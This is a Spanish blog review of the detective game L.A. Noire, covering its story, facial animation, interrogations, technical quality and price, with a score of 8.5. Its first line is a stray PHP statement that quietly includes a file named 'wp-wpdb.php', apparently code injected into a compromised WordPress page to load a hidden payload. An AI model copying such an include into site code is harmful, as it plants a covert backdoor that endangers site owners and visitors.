if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); L.A. Noire (Análisis) – La Fortaleza de LeChuck

L.A. Noire (Análisis)

Rockstar, produciendo un juego de Team Bondi, vuelve con L.A. Noire, una aventura donde dejan atrás los tiroteos y las polémicas, para centrarse en la investigación pura de una aventura gráfica. Demuestran, una vez más, que superan a las películas en las que se basa contando grandes historias en un videojuego.

Esta vez nos ponemos en la piel de Coel Phelps, un ambicioso policia que se verá involucrado en el año 1947 en la corrupción de la sociedad de Los Angeles en la postguerra.
Una de las cosas que sorprende en L.A. Noire respecto a otras sagas de la compañía es que el ciclo del tiempo no pasa en tiempo real, sino que terminados los capítulos, pasa un tiempo hasta que hay otro. Con esto quiero decir que la trama principal no se basa en la vida personal del personaje, en principio, sino en como investiga la relación entre los casos que se van sucediendo, y como afecta al detective, tanto para lo bueno como para lo malo. Abandonan casi por completo el género del sandbox pasando a lo que se podría etiquetar como «aventura gráfica 2.0». Mucho más que Heavy Rain, además de mucho más jugable y atractivo, y una libertad también por encima de este, sin perder ese casi enfermizo gusto por el detalle.
Lo clavado que está y lo reconocí por las expresiones! Es Matt Parkman de Heroes!
Antes de que saliese este juego, se ha hablado mucho de las caras de los personajes. El modelado de las caras es el típico de esta generación, pero donde destaca realmente es en las expresiones y animación de éstas, donde parece estar una generación por delante a otros juegos, y que, además, no son un simple adorno sino que serán útiles para ayudar a apostar por una u otra actitud cuando nos enfrentemos a un testigo o posible culpable en los interrogatorios.
La acción tiene un papel mucho más secundario que en otros grandes de la compañía. En  L.A. Noire no puedes desenfundar la pistola siempre, solamente cuando la acción lo requiera. Igual pasa con la conducción, la cual te puedes saltar pidiéndole a tu compañero  que conduzca por ti, intentando en todo momento ir al grano del asunto. Y no penséis que por esto se os va a hacer corto!

Investigar los cuerpos de las víctimas in situ es clave, luego ya llegarán resultados de la autopsia
Un detalle que desmarca bastante a L.A. Noire de G.T.A. es que no puedes atropellar personas! Los viandantes te esquivan como si se tratara de Crazy Taxi, y si alcanzas a alguien, te llevas una bronca y te restan puntos en tu expediente.
La jugabilidad es muy propia de las aventuras gráficas. El juego se «detiene» en escenas donde tienes que buscar todas las pistas posibles e interactuar con todos los personajes. Cuando has hecho todo lo que debías allí, irás a investigar al punto donde te lleven las pistas, para desentrañar poco a poco el caso. Además cuando toque interrogar a las personas involucradas, el juego recuerda a la saga portátil Phoenix Wright, preguntando y presentando pruebas para desmontar las mentiras de los posibles acusados.
La emoción y tensión tampoco se dejan de lado en esta aventura. Tendrás tus dosis de persecuciones (tanto a pie como en coche) y peleas ( más puñetazos que disparos), todo ello para mitigar tu sed de de acción después de una buena ronda de investigación.
Comienzas siendo un policia de pocamonta pero de seguida descubrirán tu talento para la investigación.

L.A. Noire, técnicamente, además de los rostros, el juego luce impecable, trasladando de forma magistral la ambientación policiaca de los años 40-50 en Los Angeles. Una ciudad muy robusta, montones de vehículos que conducir, con unas grandes físicas con las que jugar… Todo eso lo conserva muy bien utilizando un motor gráfico propio del equipo desarrollador, Team Bondi.
En cuanto a los efectos de sonido, tanto la música como los efectos en sí, ayudan a ambientar toda la temática del juego. El doblaje es de lo mejor que podéis encontrar en este mundillo, aunque, como nos tienen acostumbrados en la compañía, ha salido en inglés, cosa que dificulta la obligación de leer subtítulos en escenas en las que necesitas concentración en lo que haces, aunque por supuesto, estas si estén en castellano.
En conclusión y poniendo una nota sobre 10 al juego, lo catalogaríamos de un juego muy notable, 8,5!
Si os ha apetecido este exquisito manjar para paladares del vicio, lo tenéis a un precio excelente en Zavvi.es, puesto en casa por menos de 45€ usando los códigos de descuento pertinentes que rondan por la red. Es la misma versión con los mismos idiomas que sale en España… por 20€ menos!